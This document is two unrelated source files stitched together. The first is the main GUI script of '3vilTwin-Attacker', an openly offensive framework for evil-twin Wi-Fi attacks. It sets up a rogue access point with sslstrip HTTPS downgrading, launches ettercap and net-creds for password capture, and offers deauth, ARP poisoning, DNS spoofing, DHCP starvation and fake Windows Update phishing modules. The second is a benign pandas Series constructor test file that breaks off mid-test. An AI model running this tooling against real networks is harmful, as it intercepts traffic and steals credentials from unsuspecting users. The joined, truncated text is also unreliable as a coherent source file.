#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
#FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
#COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
#IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
#CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from PyQt4.QtGui import *
from PyQt4.QtCore import *
from shutil import move
from sys import argv
import logging
from re import search
from multiprocessing import Process
from time import asctime
from subprocess import Popen,PIPE,STDOUT,call
from Modules.ModuleStarvation import frm_dhcp_main
from Modules.ModuleDeauth import frm_window,frm_deauth
from Modules.ModuleMacchanger import frm_mac_generator
from Modules.ModuleProbeRequest import frm_PMonitor
from Modules.ModuleUpdateFake import frm_update_attack
from Modules.ModuleArpPosion import frm_Arp_Poison
from Modules.Credentials import frm_get_credentials,frm_NetCredsLogger
from Modules.ModuleDnsSpoof import frm_DnsSpoof
from Modules.utils import ProcessThread,Refactor,setup_logger,set_monitor_mode
from Core.Settings import frm_Settings
from Core.about import frmAbout
from twisted.web import http
from twisted.internet import reactor
from Plugins.sslstrip.StrippingProxy import StrippingProxy
from Plugins.sslstrip.URLMonitor import URLMonitor
from Plugins.sslstrip.CookieCleaner import CookieCleaner
from os import geteuid,system,path,getcwd,chdir,remove,popen,listdir
if search('/usr/share/',argv[0]):chdir('/usr/share/3vilTwinAttacker/')
author = ' @mh4x0f P0cl4bs Team'
emails = ['mh4root@gmail.com','p0cl4bs@gmail.com']
license = 'MIT License (MIT)'
version = '0.6.4'
date_create = '18/01/2015'
update = '27/07/2015'
desc = ['Framework for EvilTwin Attacks']
class Initialize(QMainWindow):
def __init__(self, parent=None):
super(Initialize, self).__init__(parent)
self.form_widget = SubMain(self)
self.config = frm_Settings()
self.setCentralWidget(self.form_widget)
self.setWindowTitle('3vilTwin-Attacker v' + version)
self.loadtheme(self.config.XmlThemeSelected())
def loadtheme(self,theme):
sshFile=("Core/%s.qss"%(theme))
with open(sshFile,"r") as fh:
self.setStyleSheet(fh.read())
def center(self):
frameGm = self.frameGeometry()
centerPoint = QDesktopWidget().availableGeometry().center()
frameGm.moveCenter(centerPoint)
self.move(frameGm.topLeft())
def closeEvent(self, event):
m = popen('iwconfig').readlines()
self.interface = self.config.xmlSettings('interface', 'monitor_mode',None,False)
for i in m:
if search('Mode:Monitor',i):
reply = QMessageBox.question(self, 'About Exit','Are you sure to quit?', QMessageBox.Yes |
QMessageBox.No, QMessageBox.No)
if reply == QMessageBox.Yes:
event.accept()
set_monitor_mode(self.interface).setDisable()
else:
event.ignore()
class ThRunDhcp(QThread):
def __init__(self,args):
QThread.__init__(self)
self.args = args
self.process = None
def run(self):
print 'Starting Thread:' + self.objectName()
self.process = p = Popen(self.args,
stdout=PIPE,stderr=STDOUT)
setup_logger('dhcp', './Logs/dhcp.log')
loggerDhcp = logging.getLogger('dhcp')
loggerDhcp.info('---[ Start DHCP '+asctime()+']---')
for line,data in enumerate(iter(p.stdout.readline, b'')):
print data.rstrip()
if line > 4:
self.emit(SIGNAL('Activated( QString )'),data.rstrip())
loggerDhcp.info(data.rstrip())
def stop(self):
print 'Stop thread:' + self.objectName()
if self.process is not None:
self.process.terminate()
self.process = None
class Threadsslstrip(QThread):
def __init__(self,port):
QThread.__init__(self)
self.port = port
def run(self):
print 'Starting Thread:' + self.objectName()
listenPort = self.port
spoofFavicon = False
killSessions = True
print 'SSLstrip v0.9 by Moxie Marlinspike Thread::online'
URLMonitor.getInstance().setFaviconSpoofing(spoofFavicon)
CookieCleaner.getInstance().setEnabled(killSessions)
strippingFactory = http.HTTPFactory(timeout=10)
strippingFactory.protocol = StrippingProxy
reactor.listenTCP(int(listenPort), strippingFactory)
reactor.run(installSignalHandlers=False)
def stop(self):
print 'Stop thread:' + self.objectName()
try:
reactor.stop()
except:pass
class SubMain(QWidget):
def __init__(self, parent = None):
super(SubMain, self).__init__(parent)
#self.create_sys_tray()
self.Main = QVBoxLayout()
self.config = frm_Settings()
self.module_arp = frm_Arp_Poison()
self.interface = 'None'
self.thread = []
self.Apthreads = {'RougeAP': []}
self.MonitorImport = frm_deauth()
self.PortRedirect = None
self.Ap_iface = None
self.setGeometry(0, 0, 300, 400)
self.FSettings = frm_Settings()
self.intGUI()
def intGUI(self):
self.myQMenuBar = QMenuBar(self)
self.myQMenuBar.setFixedWidth(400)
self.StatusBar = QStatusBar()
self.StatusBar.setFixedHeight(15)
self.StatusBar.addWidget(QLabel("::Access|Point::"))
self.StatusDhcp = QLabel("")
self.Started(False)
Menu_file = self.myQMenuBar.addMenu('&File')
exportAction = QAction('exportToHtml', self)
deleteAction = QAction('Clear Logger', self)
exitAction = QAction('Exit', self)
exitAction.setIcon(QIcon('rsc/close-pressed.png'))
deleteAction.setIcon(QIcon('rsc/delete.png'))
exportAction.setIcon(QIcon('rsc/export.png'))
Menu_file.addAction(exportAction)
Menu_file.addAction(deleteAction)
Menu_file.addAction(exitAction)
exitAction.triggered.connect(exit)
deleteAction.triggered.connect(self.delete_logger)
exportAction.triggered.connect(self.exportHTML)
Menu_View = self.myQMenuBar.addMenu('&View')
phishinglog = QAction('Credentials Phishing', self)
netcredslog = QAction('Credentials NetCreds', self)
#connect
phishinglog.triggered.connect(self.credentials)
netcredslog.triggered.connect(self.logsnetcreds)
#icons
phishinglog.setIcon(QIcon('rsc/password.png'))
netcredslog.setIcon(QIcon('rsc/logger.png'))
Menu_View.addAction(phishinglog)
Menu_View.addAction(netcredslog)
#tools Menu
Menu_tools = self.myQMenuBar.addMenu('&Tools')
ettercap = QAction('Active Ettercap', self)
btn_drift = QAction('Active DriftNet', self)
btn_drift.setShortcut('Ctrl+Y')
ettercap.setShortcut('Ctrl+E')
ettercap.triggered.connect(self.start_etter)
btn_drift.triggered.connect(self.start_dift)
# icons tools
ettercap.setIcon(QIcon('rsc/ettercap.png'))
btn_drift.setIcon(QIcon('rsc/capture.png'))
Menu_tools.addAction(ettercap)
Menu_tools.addAction(btn_drift)
#menu module
Menu_module = self.myQMenuBar.addMenu('&Modules')
btn_deauth = QAction('Deauth Attack', self)
btn_probe = QAction('Probe Request',self)
btn_mac = QAction('Mac Changer', self)
btn_dhcpStar = QAction('DHCP S. Attack',self)
btn_winup = QAction('Windows Update',self)
btn_arp = QAction('Arp Posion Attack',self)
btn_dns = QAction('Dns Spoof Attack',self)
action_settings = QAction('Settings',self)
# Shortcut modules
btn_deauth.setShortcut('Ctrl+W')
btn_probe.setShortcut('Ctrl+K')
btn_mac.setShortcut('Ctrl+M')
btn_dhcpStar.setShortcut('Ctrl+H')
btn_winup.setShortcut('Ctrl+N')
btn_dns.setShortcut('ctrl+D')
btn_arp.setShortcut('ctrl+Q')
action_settings.setShortcut('Ctrl+X')
#connect buttons
btn_probe.triggered.connect(self.showProbe)
btn_deauth.triggered.connect(self.formDauth)
btn_mac.triggered.connect(self.form_mac)
btn_dhcpStar.triggered.connect(self.show_dhcpDOS)
btn_winup.triggered.connect(self.show_windows_update)
btn_arp.triggered.connect(self.show_arp_posion)
btn_dns.triggered.connect(self.show_dns_spoof)
action_settings.triggered.connect(self.show_settings)
#icons Modules
btn_arp.setIcon(QIcon('rsc/arp_.png'))
btn_winup.setIcon(QIcon('rsc/arp.png'))
btn_dhcpStar.setIcon(QIcon('rsc/dhcp.png'))
btn_mac.setIcon(QIcon('rsc/mac.png'))
btn_probe.setIcon(QIcon('rsc/probe.png'))
btn_deauth.setIcon(QIcon('rsc/deauth.png'))
btn_dns.setIcon(QIcon('rsc/dns_spoof.png'))
action_settings.setIcon(QIcon('rsc/setting.png'))
# add modules menu
Menu_module.addAction(btn_deauth)
Menu_module.addAction(btn_probe)
Menu_module.addAction(btn_mac)
Menu_module.addAction(btn_dhcpStar)
Menu_module.addAction(btn_winup)
Menu_module.addAction(btn_arp)
Menu_module.addAction(btn_dns)
Menu_module.addAction(action_settings)
#menu extra
Menu_extra= self.myQMenuBar.addMenu('&Extra')
Menu_about = QAction('About',self)
Menu_help = QAction('Help',self)
#icons extra
Menu_about.setIcon(QIcon('rsc/about.png'))
Menu_help.setIcon(QIcon('rsc/report.png'))
Menu_about.triggered.connect(self.about)
Menu_extra.addAction(Menu_about)
self.EditGateway = QLineEdit(self)
self.EditApName = QLineEdit(self)
self.EditChannel = QLineEdit(self)
self.selectCard = QComboBox(self)
self.ListLoggerDhcp = QListWidget(self)
self.ListLoggerDhcp.setFixedHeight(150)
try:
self.EditGateway.setText([Refactor.get_interfaces()[x] for x in Refactor.get_interfaces().keys() if x == 'gateway'][0])
except:pass
self.EditApName.setText(self.config.xmlSettings('AP', 'name',None,False))
self.EditChannel.setText(self.config.xmlSettings('channel', 'mchannel',None,False))
self.PortRedirect = self.config.xmlSettings('redirect', 'port',None,False)
n = Refactor.get_interfaces()['all']
for i,j in enumerate(n):
if search('wlan', j):
self.selectCard.addItem(n[i])
if not path.isfile('Modules/Templates/Windows_Update/Settins_WinUpdate.html'):
system('cp Settings/source.tar.gz Modules/Templates/')
system('cd Modules/Templates/ && tar -xf source.tar.gz')
remove('Modules/Templates/source.tar.gz')
driftnet = popen('which driftnet').read().split('\n')
ettercap = popen('which ettercap').read().split('\n')
dhcpd = popen('which dhcpd').read().split("\n")
dnsmasq = popen('which dnsmasq').read().split("\n")
lista = [ '/usr/sbin/airbase-ng', ettercap[0],driftnet[0],dhcpd[0],dnsmasq[0]]
self.m = []
for i in lista:self.m.append(path.isfile(i))
self.FormGroup1 = QFormLayout()
self.FormGroup2 = QFormLayout()
self.FormGroup3 = QFormLayout()
hLine = QFrame()
hLine.setFrameStyle(QFrame.HLine)
hLine.setSizePolicy(QSizePolicy.Minimum,QSizePolicy.Expanding)
hLine2 = QFrame()
hLine2.setFrameStyle(QFrame.HLine)
hLine2.setSizePolicy(QSizePolicy.Minimum,QSizePolicy.Expanding)
vbox = QVBoxLayout()
vbox.setMargin(5)
vbox.addStretch(20)
self.FormGroup1.addRow(vbox)
self.logo = QPixmap(getcwd() + '/rsc/logo.png')
self.imagem = QLabel()
self.imagem.setPixmap(self.logo)
self.FormGroup1.addRow(self.imagem)
self.GroupAP = QGroupBox()
self.GroupAP.setTitle('Access Point::')
self.FormGroup3.addRow('Gateway:', self.EditGateway)
self.FormGroup3.addRow('AP Name:', self.EditApName)
self.FormGroup3.addRow('Channel:', self.EditChannel)
self.GroupAP.setLayout(self.FormGroup3)
# grid network adapter fix
self.btrn_refresh = QPushButton('Refresh')
self.btrn_refresh.setIcon(QIcon('rsc/refresh.png'))
self.btrn_refresh.clicked.connect(self.refrash_interface)
self.layout = QFormLayout()
self.GroupAdapter = QGroupBox()
self.GroupAdapter.setTitle('Network Adapter::')
self.layout.addRow(self.selectCard)
self.layout.addRow(self.btrn_refresh)
self.GroupAdapter.setLayout(self.layout)
self.btn_start_attack = QPushButton('Start Attack', self)
self.btn_start_attack.setIcon(QIcon('rsc/start.png'))
self.btn_cancelar = QPushButton('Stop Attack', self)
self.btn_cancelar.setIcon(QIcon('rsc/Stop.png'))
self.btn_cancelar.clicked.connect(self.kill)
self.btn_start_attack.clicked.connect(self.StartApFake)
hBox = QHBoxLayout()
hBox.addWidget(self.btn_start_attack)
hBox.addWidget(self.btn_cancelar)
self.slipt = QHBoxLayout()
self.slipt.addWidget(self.GroupAP)
self.slipt.addWidget(self.GroupAdapter)
self.FormGroup2.addRow(hBox)
self.FormGroup2.addRow(self.ListLoggerDhcp)
self.FormGroup2.addRow(self.StatusBar)
self.Main.addLayout(self.FormGroup1)
self.Main.addLayout(self.slipt)
self.Main.addLayout(self.FormGroup2)
self.setLayout(self.Main)
def show_arp_posion(self):
self.Farp_posion = frm_Arp_Poison()
self.Farp_posion.setGeometry(0, 0, 450, 300)
self.Farp_posion.show()
def show_settings(self):
self.FSettings.show()
def show_windows_update(self):
self.FWinUpdate = frm_update_attack()
self.FWinUpdate.setGeometry(QRect(100, 100, 450, 300))
self.FWinUpdate.show()
def show_dhcpDOS(self):
self.Fstar = frm_dhcp_main()
self.Fstar.setGeometry(QRect(100, 100, 450, 200))
self.Fstar.show()
def showProbe(self):
self.Fprobe = frm_PMonitor()
self.Fprobe.setGeometry(QRect(100, 100, 400, 200))
self.Fprobe.show()
def formDauth(self):
self.Fdeauth = frm_window()
self.Fdeauth.setGeometry(QRect(100, 100, 200, 200))
self.Fdeauth.show()
def form_mac(self):
self.Fmac = frm_mac_generator()
self.Fmac.setGeometry(QRect(100, 100, 300, 100))
self.Fmac.show()
def show_dns_spoof(self):
self.Fdns = frm_DnsSpoof()
self.Fdns.setGeometry(QRect(100, 100, 450, 300))
self.Fdns.show()
def credentials(self):
self.Fcredentials = frm_get_credentials()
self.Fcredentials.setWindowTitle('Get credentials Phishing')
self.Fcredentials.show()
def logsnetcreds(self):
self.FnetCreds = frm_NetCredsLogger()
self.FnetCreds.setWindowTitle('NetCreds Logger')
self.FnetCreds.show()
def Started(self,bool):
if bool:
self.StatusDhcp.setText("[ON]")
self.StatusDhcp.setStyleSheet("QLabel { color : green; }")
else:
self.StatusDhcp.setText("[OFF]")
self.StatusDhcp.setStyleSheet("QLabel { color : red; }")
self.StatusBar.addWidget(self.StatusDhcp)
def dhcpLog(self,log):
self.ListLoggerDhcp.addItem(log)
self.ListLoggerDhcp.scrollToBottom()
def exportHTML(self):
contents = Refactor.exportHtml()
filename = QFileDialog.getSaveFileNameAndFilter(self,
"Save File Logger HTML","report.html","HTML (*.html)")
if len(filename) != 0:
with open(str(filename[0]),'w') as filehtml:
filehtml.write(contents),filehtml.close()
def refrash_interface(self):
self.selectCard.clear()
n = Refactor.get_interfaces()['all']
for i,j in enumerate(n):
if search('wlan', j):
self.selectCard.addItem(n[i])
def kill(self):
if self.Apthreads['RougeAP'] == []:return
for i in self.Apthreads['RougeAP']:i.stop()
terminate = [
'killall dhcpd',
'killall dnsmasq'
'killall xterm',
'iptables --flush',
'iptables --table nat --flush',
'iptables --delete-chain',
'iptables --table nat --delete-chain']
for delete in terminate:popen(delete)
set_monitor_mode(self.interface).setDisable()
self.Started(False)
Refactor.set_ip_forward(0)
self.ListLoggerDhcp.clear()
def delete_logger(self):
if listdir('Logs')!= '':
resp = QMessageBox.question(self, 'About Delete Logger',
'do you want to delete Logs?',QMessageBox.Yes |
QMessageBox.No, QMessageBox.No)
if resp == QMessageBox.Yes:
system('rm Logs/*.cap')
system('rm Logs/*.log')
def start_etter(self):
if self.m[1]:
if search(self.Ap_iface,str(popen('ifconfig').read())):
call(['sudo', 'xterm', '-geometry', '73x25-1+50',
'-T', 'ettercap', '-s', '-sb', '-si', '+sk', '-sl',
'5000', '-e', 'ettercap', '-p', '-u', '-T', '-q', '-w',
'Logs/passwords', '-i', self.Ap_iface])
else:
QMessageBox.information(self,'ettercap','ettercap not found.')
def start_dift(self):
if self.m[2]:
if search(self.Ap_iface,str(popen('ifconfig').read())):
call(['sudo', 'xterm', '-geometry', '75x15+1+200',
'-T', 'DriftNet', '-e', 'driftnet', '-i', self.Ap_iface])
else:
QMessageBox.information(self,'driftnet','driftnet not found.')
def CoreSettings(self):
range_dhcp = self.config.xmlSettings('Iprange', 'range',None,False)
self.PortRedirect = self.config.xmlSettings('redirect', 'port',None,False)
self.SettingsAP = {
'interface':
[
'ifconfig %s up'%(self.Ap_iface),
'ifconfig %s 10.0.0.1 netmask 255.255.255.0'%(self.Ap_iface),
'ifconfig %s mtu 1400'%(self.Ap_iface),
'route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1'
],
'kill':
[
'iptables --flush',
'iptables --table nat --flush',
'iptables --delete-chain',
'iptables --table nat --delete-chain',
'killall dhpcd',
'killall dnsmasq'
],
'dhcp-server':
[
'authoritative;\n',
'default-lease-time 600;\n',
'max-lease-time 7200;\n',
'subnet 10.0.0.0 netmask 255.255.255.0 {\n',
'option routers 10.0.0.1;\n',
'option subnet-mask 255.255.255.0;\n',
'option domain-name \"%s\";\n'%(str(self.EditApName.text())),
'option domain-name-servers 10.0.0.1;\n',
'range %s;\n'% range_dhcp,
'}',
],
'dnsmasq':
[
'interface=%s\n'%(self.Ap_iface),
'dhcp-range=10.0.0.10,10.0.0.50,12h\n',
'server=8.8.8.8\n',
'server=8.8.4.4\n',
]
}
Refactor.set_ip_forward(1)
for i in self.SettingsAP['interface']:popen(i)
for i in self.SettingsAP['kill']:popen(i)
dhcp_select = self.config.xmlSettings('dhcp','dhcp_server',None,False)
if dhcp_select != 'dnsmasq':
with open('Settings/dhcpd.conf','w') as dhcp:
for i in self.SettingsAP['dhcp-server']:
dhcp.write(i)
dhcp.close()
if path.isfile('/etc/dhcp/dhcpd.conf'):
system('rm /etc/dhcp/dhcpd.conf')
move('Settings/dhcpd.conf', '/etc/dhcp/')
else:
with open('Settings/dnsmasq.conf','w') as dhcp:
for i in self.SettingsAP['dnsmasq']:
dhcp.write(i)
dhcp.close()
def StartApFake(self):
self.ListLoggerDhcp.clear()
if geteuid() != 0:
QMessageBox.warning(self,'Error permission','Run as root ')
return
if len(self.selectCard.currentText()) == 0:
QMessageBox.warning(self,'Error interface','Network interface not supported :(')
return
dhcp_select = self.config.xmlSettings('dhcp','dhcp_server',None,False)
if dhcp_select != 'dnsmasq':
if not self.m[3]:
QMessageBox.warning(self,'Error dhcp','isc-dhcp-server not installed')
return
else:
if not self.m[4]:
QMessageBox.information(self,'Error dhcp','dnsmasq not installed')
return
self.interface = str(set_monitor_mode(self.selectCard.currentText()).setEnable())
self.config.xmlSettings('interface', 'monitor_mode',self.interface,False)
# airbase thread
Thread_airbase = ProcessThread(['airbase-ng',
'-c', str(self.EditChannel.text()), '-e', self.EditApName.text(),
'-F', 'Logs/'+asctime(),self.interface])
Thread_airbase.name = 'Airbase-ng'
self.Apthreads['RougeAP'].append(Thread_airbase)
Thread_airbase.start()
# settings conf
while True:
if Thread_airbase.iface != None:
self.Ap_iface = [x for x in Refactor.get_interfaces()['all'] if search('at',x)][0]
self.config.xmlSettings('netcreds', 'interface',self.Ap_iface,False)
break
# thread netcreds
Thread_netcreds = ProcessThread(['python','Plugins/NetCreds.py','-i',
self.config.xmlSettings('netcreds', 'interface',None,False)])
Thread_netcreds.setName('Net-Creds')
self.Apthreads['RougeAP'].append(Thread_netcreds)
Thread_netcreds.start()
p = Process(target=self.CoreSettings,args=())
p.start(),p.join()
# thread dhcp
selected_dhcp = self.config.xmlSettings('dhcp','dhcp_server',None,False)
if selected_dhcp == 'iscdhcpserver':
Thread_dhcp = ThRunDhcp(['sudo','dhcpd','-d','-f','-cf','/etc/dhcp/dhcpd.conf',self.Ap_iface])
self.connect(Thread_dhcp,SIGNAL('Activated ( QString ) '), self.dhcpLog)
Thread_dhcp.setObjectName('DHCP')
self.Apthreads['RougeAP'].append(Thread_dhcp)
Thread_dhcp.start()
self.Started(True)
elif selected_dhcp == 'dnsmasq':
Thread_dhcp = ThRunDhcp(['dnsmasq','-C','Settings/dnsmasq.conf','-d'])
self.connect(Thread_dhcp ,SIGNAL('Activated ( QString ) '), self.dhcpLog)
Thread_dhcp .setObjectName('DHCP')
self.Apthreads['RougeAP'].append(Thread_dhcp)
Thread_dhcp .start()
self.Started(True)
else:
QMessageBox.information(self,'DHCP','dhcp not found.')
# thread sslstrip
Thread_sslstrip = Threadsslstrip(self.PortRedirect)
Thread_sslstrip.setObjectName("sslstrip")
self.Apthreads['RougeAP'].append(Thread_sslstrip)
Thread_sslstrip.start()
iptables = []
for index in xrange(self.FSettings.ListRules.count()):
iptables.append(str(self.FSettings.ListRules.item(index).text()))
for rules in iptables:
if search('PREROUTING -p udp -j DNAT --to',rules):
popen(rules.replace('$$',str(self.EditGateway.text())))
elif search('--append FORWARD --in-interface',rules):popen(rules.replace('$$',self.Ap_iface))
elif search('--append POSTROUTING --out-interface',rules):
popen(rules.replace('$$',str(Refactor.get_interfaces()['activated'])))
else:
popen(rules)
def create_sys_tray(self):
self.sysTray = QSystemTrayIcon(self)
self.sysTray.setIcon(QIcon('rsc/icon.ico'))
self.sysTray.setVisible(True)
self.connect(self.sysTray,
SIGNAL('activated(QSystemTrayIcon::ActivationReason)'),
self.on_sys_tray_activated)
self.sysTrayMenu = QMenu(self)
act = self.sysTrayMenu.addAction('FOO')
def on_sys_tray_activated(self, reason):
if reason == 3:self.showNormal()
elif reason == 2:self.showMinimized()
def about(self):
self.Fabout = frmAbout(author,emails,
version,date_create,update,license,desc)
self.Fabout.show()
|
|
# coding=utf-8
# pylint: disable-msg=E1101,W0612
import pytest
from datetime import datetime, timedelta
from numpy import nan
import numpy as np
import numpy.ma as ma
import pandas as pd
from pandas.api.types import CategoricalDtype
from pandas.core.dtypes.common import (
is_categorical_dtype,
is_datetime64tz_dtype)
from pandas import (Index, Series, isna, date_range,
NaT, period_range, MultiIndex, IntervalIndex)
from pandas.core.indexes.datetimes import Timestamp, DatetimeIndex
from pandas._libs import lib
from pandas._libs.tslib import iNaT
from pandas.compat import lrange, range, zip, long
from pandas.util.testing import assert_series_equal
import pandas.util.testing as tm
from .common import TestData
class TestSeriesConstructors(TestData):
def test_invalid_dtype(self):
# GH15520
msg = 'not understood'
invalid_list = [pd.Timestamp, 'pd.Timestamp', list]
for dtype in invalid_list:
with tm.assert_raises_regex(TypeError, msg):
Series([], name='time', dtype=dtype)
def test_scalar_conversion(self):
# Pass in scalar is disabled
scalar = Series(0.5)
assert not isinstance(scalar, float)
# Coercion
assert float(Series([1.])) == 1.0
assert int(Series([1.])) == 1
assert long(Series([1.])) == 1
def test_constructor(self):
assert self.ts.index.is_all_dates
# Pass in Series
derived = Series(self.ts)
assert derived.index.is_all_dates
assert tm.equalContents(derived.index, self.ts.index)
# Ensure new index is not created
assert id(self.ts.index) == id(derived.index)
# Mixed type Series
mixed = Series(['hello', np.NaN], index=[0, 1])
assert mixed.dtype == np.object_
assert mixed[1] is np.NaN
assert not self.empty.index.is_all_dates
assert not Series({}).index.is_all_dates
pytest.raises(Exception, Series, np.random.randn(3, 3),
index=np.arange(3))
mixed.name = 'Series'
rs = Series(mixed).name
xp = 'Series'
assert rs == xp
# raise on MultiIndex GH4187
m = MultiIndex.from_arrays([[1, 2], [3, 4]])
pytest.raises(NotImplementedError, Series, m)
def test_constructor_empty(self):
empty = Series()
empty2 = Series([])
# the are Index() and RangeIndex() which don't compare type equal
# but are just .equals
assert_series_equal(empty, empty2, check_index_type=False)
empty = Series(index=lrange(10))
empty2 = Series(np.nan, index=lrange(10))
assert_series_equal(empty, empty2)
def test_constructor_series(self):
index1 = ['d', 'b', 'a', 'c']
index2 = sorted(index1)
s1 = Series([4, 7, -5, 3], index=index1)
s2 = Series(s1, index=index2)
assert_series_equal(s2, s1.sort_index())
def test_constructor_iterator(self):
expected = Series(list(range(10)), dtype='int64')
result = Series(range(10), dtype='int64')
assert_series_equal(result, expected)
def test_constructor_list_like(self):
# make sure that we are coercing different
# list-likes to standard dtypes and not
# platform specific
expected = Series([1, 2, 3], dtype='int64')
for obj in [[1, 2, 3], (1, 2, 3),
np.array([1, 2, 3], dtype='int64')]:
result = Series(obj, index=[0, 1, 2])
assert_series_equal(result, expected)
def test_constructor_generator(self):
gen = (i for i in range(10))
result = Series(gen)
exp = Series(lrange(10))
assert_series_equal(result, exp)
gen = (i for i in range(10))
result = Series(gen, index=lrange(10, 20))
exp.index = lrange(10, 20)
assert_series_equal(result, exp)
def test_constructor_map(self):
# GH8909
m = map(lambda x: x, range(10))
result = Series(m)
exp = Series(lrange(10))
assert_series_equal(result, exp)
m = map(lambda x: x, range(10))
result = Series(m, index=lrange(10, 20))
exp.index = lrange(10, 20)
assert_series_equal(result, exp)
def test_constructor_categorical(self):
cat = pd.Categorical([0, 1, 2, 0, 1, 2], ['a', 'b', 'c'],
fastpath=True)
res = Series(cat)
tm.assert_categorical_equal(res.values, cat)
# GH12574
pytest.raises(
ValueError, lambda: Series(pd.Categorical([1, 2, 3]),
dtype='int64'))
cat = Series(pd.Categorical([1, 2, 3]), dtype='category')
assert is_categorical_dtype(cat)
assert is_categorical_dtype(cat.dtype)
s = Series([1, 2, 3], dtype='category')
assert is_categorical_dtype(s)
assert is_categorical_dtype(s.dtype)
def test_constructor_categorical_dtype(self):
result = pd.Series(['a', 'b'],
dtype=CategoricalDtype(['a', 'b', 'c'],
ordered=True))
assert is_categorical_dtype(result) is True
tm.assert_index_equal(result.cat.categories, pd.Index(['a', 'b', 'c']))
assert result.cat.ordered
result = pd.Series(['a', 'b'], dtype=CategoricalDtype(['b', 'a']))
assert is_categorical_dtype(result)
tm.assert_index_equal(result.cat.categories, pd.Index(['b', 'a']))
assert result.cat.ordered is False
def test_unordered_compare_equal(self):
left = pd.Series(['a', 'b', 'c'],
dtype=CategoricalDtype(['a', 'b']))
right = pd.Series(pd.Categorical(['a', 'b', np.nan],
categories=['a', 'b']))
tm.assert_series_equal(left, right)
def test_constructor_maskedarray(self):
data = ma.masked_all((3, ), dtype=float)
result = Series(data)
expected = Series([nan, nan, nan])
assert_series_equal(result, expected)
data[0] = 0.0
data[2] = 2.0
index = ['a', 'b', 'c']
result = Series(data, index=index)
expected = Series([0.0, nan, 2.0], index=index)
assert_series_equal(result, expected)
data[1] = 1.0
result = Series(data, index=index)
expected = Series([0.0, 1.0, 2.0], index=index)
assert_series_equal(result, expected)
data = ma.masked_all((3, ), dtype=int)
result = Series(data)
expected = Series([nan, nan, nan], dtype=float)
assert_series_equal(result, expected)
data[0] = 0
data[2] = 2
index = ['a', 'b', 'c']
result = Series(data, index=index)
expected = Series([0, nan, 2], index=index, dtype=float)
assert_series_equal(result, expected)
data[1] = 1
result = Series(data, index=index)
expected = Series([0, 1, 2], index=index, dtype=int)
assert_series_equal(result, expected)
data = ma.masked_all((3, ), dtype=bool)
result = Series(data)
expected = Series([nan, nan, nan], dtype=object)
assert_series_equal(result, expected)
data[0] = True
data[2] = False
index = ['a', 'b', 'c']
result = Series(data, index=index)
expected = Series([True, nan, False], index=index, dtype=object)
assert_series_equal(result, expected)
data[1] = True
result = Series(data, index=index)
expected = Series([True, True, False], index=index, dtype=bool)
assert_series_equal(result, expected)
data = ma.masked_all((3, ), dtype='M8[ns]')
result = Series(data)
expected = Series([iNaT, iNaT, iNaT], dtype='M8[ns]')
assert_series_equal(result, expected)
data[0] = datetime(2001, 1, 1)
data[2] = datetime(2001, 1, 3)
index = ['a', 'b', 'c']
result = Series(data, index=index)
expected = Series([datetime(2001, 1, 1), iNaT,
datetime(2001, 1, 3)], index=index, dtype='M8[ns]')
assert_series_equal(result, expected)
data[1] = datetime(2001, 1, 2)
result = Series(data, index=index)
expected = Series([datetime(2001, 1, 1), datetime(2001, 1, 2),
datetime(2001, 1, 3)], index=index, dtype='M8[ns]')
assert_series_equal(result, expected)
def test_series_ctor_plus_datetimeindex(self):
rng = date_range('20090415', '20090519', freq='B')
data = dict((k, 1) for k in rng)
result = Series(data, index=rng)
assert result.index is rng
def test_constructor_default_index(self):
s = Series([0, 1, 2])
tm.assert_index_equal(s.index, pd.Index(np.arange(3)))
def test_constructor_corner(self):
df = tm.makeTimeDataFrame()
objs = [df, df]
s = Series(objs, index=[0, 1])
assert isinstance(s, Series)
def test_constructor_sanitize(self):
s = Series(np.array([1., 1., 8.]), dtype='i8')
assert s.dtype == np.dtype('i8')
s = Series(np.array([1., 1., np.nan]), copy=True, dtype='i8')
assert s.dtype == np.dtype('f8')
def test_constructor_copy(self):
# GH15125
# test dtype parameter has no side effects on copy=True
for data in [[1.], np.array([1.])]:
x = Series(data)
y = pd.Series(x, copy=True, dtype=float)
# copy=True maintains original data in Series
tm.assert_series_equal(x, y)
# changes to origin of copy does not affect the copy
x[0] = 2.
assert not x.equals(y)
assert x[0] == 2.
assert y[0] == 1.
def test_constructor_pass_none(self):
s = Series(None, index=lrange(5))
assert s.dtype == np.float64
s = Series(None, index=lrange(5), dtype=object)
assert s.dtype == np.object_
# GH 7431
# inference on the index
s = Series(index=np.array([None]))
expected = Series(index=Index([None]))
assert_series_equal(s, expected)
def test_constructor_pass_nan_nat(self):
# GH 13467
exp = Series([np.nan, np.nan], dtype=np.float64)
assert exp.dtype == np.float64
tm.assert_series_equal(Series([np.nan, np.nan]), exp)
tm.assert_series_equal(Series(np.array([np.nan, np.nan])), exp)
exp = Series([pd.NaT, pd.NaT])
assert exp.dtype == 'datetime64[ns]'
tm.assert_series_equal(Series([pd.NaT, pd.NaT]), exp)
tm.assert_series_equal(Series(np.array([pd.NaT, pd.NaT])), exp)
tm.assert_series_equal(Series([pd.NaT, np.nan]), exp)
tm.assert_series_equal(Series(np.array([pd.NaT, np.nan])), exp)
tm.assert_series_equal(Series([np.nan, pd.NaT]), exp)
tm.assert_series_equal(Series(np.array([np.nan, pd.NaT])), exp)
def test_constructor_cast(self):
pytest.raises(ValueError, Series, ['a', 'b', 'c'], dtype=float)
def test_constructor_dtype_nocast(self):
# 1572
s = Series([1, 2, 3])
s2 = Series(s, dtype=np.int64)
s2[1] = 5
assert s[1] == 5
def test_constructor_datelike_coercion(self):
# GH 9477
# incorrectly infering on dateimelike looking when object dtype is
# specified
s = Series([Timestamp('20130101'), 'NOV'], dtype=object)
assert s.iloc[0] == Timestamp('20130101')
assert s.iloc[1] == 'NOV'
assert s.dtype == object
# the dtype was being reset on the slicing and re-inferred to datetime
# even thought the blocks are mixed
belly = '216 3T19'.split()
wing1 = '2T15 4H19'.split()
wing2 = '416 4T20'.split()
mat = pd.to_datetime('2016-01-22 2019-09-07'.split())
